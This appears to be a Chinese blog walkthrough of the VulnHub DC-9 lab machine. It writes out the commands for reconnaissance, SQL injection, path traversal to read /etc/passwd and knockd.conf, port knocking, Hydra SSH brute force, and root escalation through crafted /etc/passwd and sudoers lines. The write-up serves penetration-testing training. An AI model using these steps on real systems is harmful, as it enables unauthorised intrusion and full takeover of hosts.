vulnhub DC-9靶场

1.信息收集

扫描主机

sudo arp-scan -l

图片[1] - vulnhub DC-9靶场 - MaxSSL

扫描端口,发现只有80端口

nmap -p- 192.168.42.150

图片[2] - vulnhub DC-9靶场 - MaxSSL

扫描80开放的服务

nmap -p 80 -A -V 192.168.42.150

图片[3] - vulnhub DC-9靶场 - MaxSSL

2.漏洞发掘

访问主页面

图片[4] - vulnhub DC-9靶场 - MaxSSL

发现有查找功能,猜测此处有sql注入漏洞

图片[5] - vulnhub DC-9靶场 - MaxSSL

测试sql注入漏洞

‘ or 1=1#

图片[6] - vulnhub DC-9靶场 - MaxSSL

获取成功,存在注入漏洞,开始利用

图片[7] - vulnhub DC-9靶场 - MaxSSL

图片[8] - vulnhub DC-9靶场 - MaxSSL

bp开始抓包,跑sqlmap

图片[9] - vulnhub DC-9靶场 - MaxSSL

跑出了admin的账号和密码

图片[10] - vulnhub DC-9靶场 - MaxSSL

密码明显长度不太对,猜测为md5加密,在网上在线破解,得到密码

图片[11] - vulnhub DC-9靶场 - MaxSSL

admin登录,开始逛街

图片[12] - vulnhub DC-9靶场 - MaxSSL

发现下面提示,猜测有文件包含漏洞(目录穿越)

图片[13] - vulnhub DC-9靶场 - MaxSSL

不放心可以多敲几个../

?file=../../../../../../../../../etc/passwd

图片[14] - vulnhub DC-9靶场 - MaxSSL

因为前面我们只扫描到80端口,22没有扫到,那只有两种情况,一种22没有开放,一种有knockd服务,

该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。

如果开启了knockd服务,那么会存在一个配置文件/etc/knockd.conf,该配置文件中保存着需要访问的端口顺序。我们可以通过文件包含漏洞查看该配置文件

?file=/etc/knockd.conf

图片[15] - vulnhub DC-9靶场 - MaxSSL

根据配置文件,依次访问三个端口,再次扫描,发现22端口开放

knock 192.168.42.150 7469 8475 9842

图片[16] - vulnhub DC-9靶场 - MaxSSL

因为之前sqlmap跑出了三个数据库,我们看看另一个内容

图片[17] - vulnhub DC-9靶场 - MaxSSL

发现一堆账号密码,尝试ssh爆破

图片[18] - vulnhub DC-9靶场 - MaxSSL

九头蛇爆破,发现3个账号,只有janitor有东西

hybra -L 账号. txt -P 密码.txt ssh://192.168.42.150

图片[19] - vulnhub DC-9靶场 - MaxSSL

图片[20] - vulnhub DC-9靶场 - MaxSSL

3.横向渗透

ssh连接

ssh janitor@192.168.42.150

图片[21] - vulnhub DC-9靶场 - MaxSSL

ls发现没文件,ls -al查看隐藏文件,发现新的密码本

图片[22] - vulnhub DC-9靶场 - MaxSSL

重新爆破密码,发现新的账号

fredf B4-Tru3-001

图片[23] - vulnhub DC-9靶场 - MaxSSL

4.提升权限

常规查看权限

sudo -l

图片[24] - vulnhub DC-9靶场 - MaxSSL

尝试执行,返回错误,找到test.py,查看代码

find / -name test.py 2>/dev/null

图片[25] - vulnhub DC-9靶场 - MaxSSL

发现代码作用需要两个文件,把第一文件追加到第二个文件后

4.1构造用户行,写入/etc/passwd

openssl生成密码,前一个xihe为账号,后一个为要加密的密码,

openssl passwd -1 -salt xihe xihe

生成的密码

$1$xihe$UAMCUAzSxt0fZHIag4Ryi1

图片[26] - vulnhub DC-9靶场 - MaxSSL

把密码写入一个文件中,使用该脚本,追加成功

echo写不进去,用vi写

图片[27] - vulnhub DC-9靶场 - MaxSSL

切换用户 su ,提权成功

图片[28] - vulnhub DC-9靶场 - MaxSSL

4.2构造权限行,写入/etc/sudoers

fredf用户为root,不需要任何密码

fredf ALL=(root) NOPASSWD:ALL

echo "fredf ALL=(root) NOPASSWD:ALL" > 3.txt
sudo /opt/devstuff/dist/test/test 3.txt /etc/sudoers

图片[29] - vulnhub DC-9靶场 - MaxSSL

sudo su root

图片[30] - vulnhub DC-9靶场 - MaxSSL

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享